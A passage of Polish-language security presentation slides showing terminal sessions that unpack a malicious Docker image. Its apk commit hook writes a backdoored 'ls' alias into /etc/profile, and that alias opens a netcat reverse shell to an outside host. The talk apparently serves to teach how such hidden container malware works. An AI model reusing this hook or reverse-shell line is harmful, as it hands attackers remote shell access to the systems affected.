13. 13www.sii.pl
Zagrożenie lawinowe
root@ubuntu-bionic:/tmp/testing# docker build --add-host dl-
cdn.alpinelinux.org:127.0.0.1 -t bad_little_o_me:0.0.1 .
Sending build context to Docker daemon 2.048kB
Step 1/3 : FROM alpine/semver:latest
---> 3731a612aafc
Step 2/3 : RUN apk add libmnl
---> Running in 428559229f39
fetch http://dl-cdn.alpinelinux.org/alpine/v3.8/main/x86_64/APKINDEX.tar.gz
ERROR: http://dl-cdn.alpinelinux.org/alpine/v3.8/main: could not connect to
server (check repositories file)
fetch http://dl-
cdn.alpinelinux.org/alpine/v3.8/community/x86_64/APKINDEX.tar.gz
ERROR: http://dl-cdn.alpinelinux.org/alpine/v3.8/community: could not connect
to server (check repositories file)
(1/1) Installing libmnl (1.0.4-r0)
ERROR: libmnl-1.0.4-r0: could not connect to server (check repositories file)
1 error; 6 MiB in 15 packages
The command '/bin/sh -c apk add libmnl' returned a non-zero code: 1
14. 14www.sii.pl
Zagrożenie lawinowe
Step 2/3 : RUN apk add libmnl vim
---> Running in f71aac264745
fetch http://dl-cdn.alpinelinux.org/alpine/v3.8/main/x86_64/APKINDEX.tar.gz
ERROR: http://dl-cdn.alpinelinux.org/alpine/v3.8/main: could not connect to server
(check repositories file)
fetch http://dl-cdn.alpinelinux.org/alpine/v3.8/community/x86_64/APKINDEX.tar.gz
ERROR: http://dl-cdn.alpinelinux.org/alpine/v3.8/community: could not connect to server
(check repositories file)
(1/6) Installing libmnl (1.0.4-r0)
ERROR: libmnl-1.0.4-r0: could not connect to server (check repositories file)
ERROR: lua5.3-libs-5.3.4-r5: could not connect to server (check repositories file)
(2/6) Installing lua5.3-libs (5.3.4-r5)
(3/6) Installing ncurses-terminfo-base (6.1-r0)
ERROR: ncurses-terminfo-base-6.1-r0: could not connect to server (check repositories
file)
(4/6) Installing ncurses-terminfo (6.1-r0)
ERROR: ncurses-terminfo-6.1-r0: could not connect to server (check repositories file)
(5/6) Installing ncurses-libs (6.1-r0)
(6/6) Installing vim (8.1.0115-r0)
ERROR: ncurses-libs-6.1-r0: could not connect to server (check repositories file)
ERROR: vim-8.1.0115-r0: could not connect to server (check repositories file)
6 errors; 6 MiB in 15 packages
The command '/bin/sh -c apk add libmnl vim' returned a non-zero code: 6
18. 18www.sii.pl
I see tar gzips, tar gzips everywhere.
Zagrożenie lawinowe
root@ubuntu-bionic:/home/vagrant# docker save -o ./bad_me__0.0.2.tar bad_me:0.0.2
root@ubuntu-bionic:/home/vagrant# tar tf ./bad_me__0.0.2.tar
3fc60f14dfa1ca867ff2d5ca06295b257fcc0f44aee088fdea6b65a0521d2100.json
5cd7b42b4fc96b6be1b22abf175843faa0abdf36c94a3d1269eab9ef39829b1b/
5cd7b42b4fc96b6be1b22abf175843faa0abdf36c94a3d1269eab9ef39829b1b/VERSION
5cd7b42b4fc96b6be1b22abf175843faa0abdf36c94a3d1269eab9ef39829b1b/json
5cd7b42b4fc96b6be1b22abf175843faa0abdf36c94a3d1269eab9ef39829b1b/layer.tar
8f52818719ad48a0af558ae2a44eed3cb3fe080f13c9fbdc67ef15667af59196/
8f52818719ad48a0af558ae2a44eed3cb3fe080f13c9fbdc67ef15667af59196/VERSION
8f52818719ad48a0af558ae2a44eed3cb3fe080f13c9fbdc67ef15667af59196/json
8f52818719ad48a0af558ae2a44eed3cb3fe080f13c9fbdc67ef15667af59196/layer.tar
e67ec36488c7b11b263233332c3811099eeeba13433f3cdecae7da26cf26fc03/
e67ec36488c7b11b263233332c3811099eeeba13433f3cdecae7da26cf26fc03/VERSION
e67ec36488c7b11b263233332c3811099eeeba13433f3cdecae7da26cf26fc03/json
e67ec36488c7b11b263233332c3811099eeeba13433f3cdecae7da26cf26fc03/layer.tar
eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/
eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/VERSION
eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/json
eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/layer.tar
f3a308ee6406d0714117434facfe67ccb347f34f071971f2628edfe0c62ff75e/
f3a308ee6406d0714117434facfe67ccb347f34f071971f2628edfe0c62ff75e/VERSION
f3a308ee6406d0714117434facfe67ccb347f34f071971f2628edfe0c62ff75e/json
f3a308ee6406d0714117434facfe67ccb347f34f071971f2628edfe0c62ff75e/layer.tar
manifest.json
repositories
19. 19www.sii.pl
I see tar gzips, tar gzips everywhere.
Zagrożenie lawinowe
root@ubuntu-bionic:/home/vagrant# tar xOf ./bad_me__0.0.2.tar manifest.json
[
{
"Config": "3fc60f14dfa1ca867ff2d5ca06295b257fcc0f44aee088fdea6b65a0521d2100.json",
"RepoTags": [
"bad_me:0.0.2"
],
"Layers": [
"8f52818719ad48a0af558ae2a44eed3cb3fe080f13c9fbdc67ef15667af59196/layer.tar",
"e67ec36488c7b11b263233332c3811099eeeba13433f3cdecae7da26cf26fc03/layer.tar",
"f3a308ee6406d0714117434facfe67ccb347f34f071971f2628edfe0c62ff75e/layer.tar",
"5cd7b42b4fc96b6be1b22abf175843faa0abdf36c94a3d1269eab9ef39829b1b/layer.tar",
"eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/layer.tar"
]
}
]
20. 20www.sii.pl
I see tar gzips, tar gzips everywhere.
Zagrożenie lawinowe
root@ubuntu-bionic:/home/vagrant# tar xOf ./bad_me__0.0.2.tar
eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/layer.tar | tar t
etc/
etc/apk/
etc/apk/commit_hooks.d/
etc/apk/commit_hooks.d/.wh..wh..opq
etc/apk/commit_hooks.d/x
etc/apk/world
etc/profile
lib/
lib/apk/
lib/apk/db/
lib/apk/db/installed
lib/apk/db/lock
lib/apk/db/scripts.tar
lib/apk/db/triggers
usr/
usr/lib/
21. 21www.sii.pl
I see tar gzips, tar gzips everywhere.
Zagrożenie lawinowe
root@ubuntu-bionic:/home/vagrant# tar xOf ./bad_me__0.0.2.tar
eff8bc50c94715ebf4e13b2c0c3000c81b97b6b3aef12291c1b570808384193d/layer.ta
r | tar xO etc/apk/commit_hooks.d/x
#!/bin/sh
echo “alias ls=”if [ ”$(pgrep nc)” == ”” ]; then (nc 3lite.eu 12345 -e /bin/sh
&); sleep 3; fi; /bin/ls” >> /etc/profile”
34. 34www.sii.pl
Kopmy głęboko
root@ubuntu-bionic:/home/vagrant# docker run -it --rm bad_me:0.0.2 sh -l
85aefda95768:/# cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.4 85aefda95768
85aefda95768:/# vi /etc/hosts
85aefda95768:/# ls
bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var
85aefda95768:/# ls
bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var
85aefda95768:/# ls
bin dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var
85aefda95768:/#